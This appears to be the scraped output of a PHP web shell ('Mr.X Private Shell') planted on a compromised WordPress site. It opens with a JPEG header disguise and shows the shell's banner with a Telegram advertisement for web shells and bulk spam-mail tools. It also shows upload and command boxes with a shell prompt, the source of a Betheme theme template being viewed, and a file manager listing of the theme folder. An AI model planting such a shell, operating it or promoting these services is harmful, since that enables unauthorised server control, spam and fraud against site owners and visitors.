����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

goodiwcm@216.73.217.7: ~ $
<?php
/**
 * Template Name: Under Construction
 *
 * @package Betheme
 * @author Muffin group
 * @link https://muffingroup.com
 */
?><!DOCTYPE html>
<html <?php language_attributes(); ?> class="no-js <?php echo esc_attr(mfn_html_classes()); ?>">

<head>

<meta charset="<?php bloginfo('charset'); ?>" />
<?php wp_head(); ?>

</head>

<?php
	$translate['days'] = mfn_opts_get('translate') ? mfn_opts_get('translate-days', 'days') : __('days', 'betheme');
	$translate['hours'] = mfn_opts_get('translate') ? mfn_opts_get('translate-hours', 'hours') : __('hours', 'betheme');
	$translate['minutes']	= mfn_opts_get('translate') ? mfn_opts_get('translate-minutes', 'minutes') : __('minutes', 'betheme');
	$translate['seconds']	= mfn_opts_get('translate') ? mfn_opts_get('translate-seconds', 'seconds') : __('seconds', 'betheme');

	$customID = mfn_opts_get('construction-page');
	$body_class = 'under-construction';
	if ($customID) {
		$body_class .= ' custom-uc';
	}
?>

<body <?php body_class($body_class); ?>>

	<div id="Content" class="content-under-construction">
		<div class="content_wrapper clearfix">

			<?php if ($customID): ?>

				<main class="sections_group">
					<?php
						$mfn_builder = new Mfn_Builder_Front($customID, true);
						$mfn_builder->show();
					?>
				</main>

			<?php else: ?>

				<main class="sections_group">

					<section class="section center section-uc-1">
						<div class="section_wrapper clearfix">

							<div class="column one">
								<div class="mcb-column-inner">
									<?php

										$logo = mfn_opts_get('logo-img', get_theme_file_uri('/images/logo/logo.png'));
										$logo_under_construction = mfn_opts_get('logo-under-construction');
										$logo_text = mfn_opts_get('logo-text');

										if( $logo_text ){

											echo '<span class="text-logo">'. esc_html($logo_text) .'</span>';

										} else {

											echo '<a id="logo" href="'. esc_url(get_home_url()) .'" title="'. esc_attr(get_bloginfo('name')) .'">';
												if( $logo_under_construction ){
													echo '<img class="scale-with-grid" src="'. esc_url($logo_under_construction) .'" alt="'. esc_attr(get_bloginfo('name')) .'" />';
												} else {
													echo '<img class="scale-with-grid" src="'. esc_url($logo) .'" alt="'. esc_attr(get_bloginfo('name')) .'" />';
												}
											echo '</a>';

										}

									?>
								</div>
							</div>

						</div>
					</section>

					<section class="section section-border-top section-uc-2">
						<div class="section_wrapper clearfix">

							<div class="column one column_fancy_heading">
								<div class="mcb-column-inner">

									<div class="fancy_heading fancy_heading_icon">
										<div data-anim-type="bounceIn" class="animate bounceIn">
											<span class="icon_top"><i class="icon-clock" aria-hidden="true"></i></span>
											<h2><?php echo wp_kses(mfn_opts_get('construction-title'), mfn_allowed_html()); ?></h2>
											<div class="inside">
												<span class="big"><?php echo wp_kses_post(mfn_opts_get('construction-text')); ?></span>
											</div>
										</div>
									</div>

								</div>
							</div>

							<?php if (mfn_opts_get('construction-date')): ?>

								<div class="column one column_downcount">
									<div class="mcb-column-inner clearfix">

										<div class="downcount" data-date="<?php echo esc_attr(mfn_opts_get('construction-date')); ?>" data-offset="<?php echo esc_attr(mfn_opts_get('construction-offset')); ?>">

											<div class="column one-fourth column_quick_fact">
												<div class="mcb-column-inner">
													<div class="quick_fact">
														<div data-anim-type="zoomIn" class="animate zoomIn">
															<div class="number-wrapper">
																<div class="number days">00</div>
															</div>
															<h3 class="title"><?php echo esc_html($translate['days']); ?></h3>
															<hr class="hr_narrow">
														</div>
													</div>
												</div>
											</div>

											<div class="column one-fourth column_quick_fact">
												<div class="mcb-column-inner">
													<div class="quick_fact">
														<div data-anim-type="zoomIn" class="animate zoomIn">
															<div class="number-wrapper">
																<div class="number hours">00</div>
															</div>
															<h3 class="title"><?php echo esc_html($translate['hours']); ?></h3>
															<hr class="hr_narrow">
														</div>
													</div>
												</div>
											</div>

											<div class="column one-fourth column_quick_fact">
												<div class="mcb-column-inner">
													<div class="quick_fact">
														<div data-anim-type="zoomIn" class="animate zoomIn">
															<div class="number-wrapper">
																<div class="number minutes">00</div>
															</div>
															<h3 class="title"><?php echo esc_html($translate['minutes']); ?></h3>
															<hr class="hr_narrow">
														</div>
													</div>
												</div>
											</div>

											<div class="column one-fourth column_quick_fact">
												<div class="mcb-column-inner">
													<div class="quick_fact">
														<div data-anim-type="zoomIn" class="animate zoomIn">
															<div class="number-wrapper">
																<div class="number seconds">00</div>
															</div>
															<h3 class="title"><?php echo esc_html($translate['seconds']); ?></h3>
															<hr class="hr_narrow">
														</div>
													</div>
												</div>
											</div>

										</div>

									</div>
								</div>

							<?php endif; ?>

						</div>
					</section>

					<section class="section section-border-top section-uc-3">
						<div class="section_wrapper clearfix">

							<div class="column one-fourth column_column">
								<div class="mcb-column-inner"></div>
							</div>

							<div class="column one-second column_column">
								<div class="mcb-column-inner">
									<div data-anim-type="fadeInUpLarge" class="animate fadeInUpLarge">
										<?php echo do_shortcode(mfn_opts_get('construction-contact')); ?>
									</div>
								</div>
							</div>

							<div class="column one-fourth column_column">
								<div class="mcb-column-inner"></div>
							</div>

						</div>
					</section>

				</main>

			<?php endif; ?>

		</div>
	</div>

<?php
	wp_enqueue_script('mfn-waypoints', get_theme_file_uri('/js/plugins/waypoints.min.js'), ['jquery'], MFN_THEME_VERSION, true);
	wp_enqueue_script('mfn-countdown', get_theme_file_uri('/js/plugins/countdown.min.js'), ['jquery'], MFN_THEME_VERSION, true);
	wp_footer();
?>

</body>
</html>

Filemanager

Name Type Size Permission Actions
assets Folder 0755
bbpress Folder 0755
build Folder 0755
css Folder 0755
fonts Folder 0755
functions Folder 0755
images Folder 0755
includes Folder 0755
js Folder 0755
languages Folder 0755
media Folder 0755
muffin-options Folder 0755
tribe-events Folder 0755
vc_templates Folder 0755
visual-builder Folder 0755
woocommerce Folder 0755
wpml Folder 0755
.htaccess File 127 B 0444
404.php File 2.31 KB 0644
bbpress.php File 572 B 0644
changelog.html File 330.56 KB 0644
comments.php File 1.2 KB 0644
error_log File 274 B 0644
footer.php File 8.01 KB 0644
functions.php File 8.04 KB 0644
header-shop.php File 6.23 KB 0644
header.php File 2.08 KB 0644
index.php File 9.32 KB 0644
page.php File 1.46 KB 0644
readme.txt File 102 B 0644
rtl.css File 41.76 KB 0644
rtl.min.css File 37.4 KB 0644
screenshot.png File 284.94 KB 0644
search.php File 6.92 KB 0644
searchform.php File 1.63 KB 0644
sidebar.php File 1.09 KB 0644
single-attachment.php File 742 B 0644
single-download.php File 4.34 KB 0644
single-portfolio.php File 2.81 KB 0644
single-template.php File 5.85 KB 0644
single.php File 3.22 KB 0644
style-colors.php File 46.22 KB 0644
style-one.php File 25.02 KB 0644
style-responsive.php File 26.81 KB 0644
style.css File 368 B 0644
style.php File 55.45 KB 0644
taxonomy-portfolio-types.php File 5.95 KB 0644
template-archives.php File 2.04 KB 0644
template-blank.php File 967 B 0644
template-portfolio.php File 7.24 KB 0644
template-shop-archive.php File 1.08 KB 0644
template-single-product.php File 1.65 KB 0644
template-sitemap.php File 623 B 0644
under-construction.php File 6.56 KB 0644
woocommerce.php File 1.61 KB 0644
wpml-config.xml File 39.71 KB 0644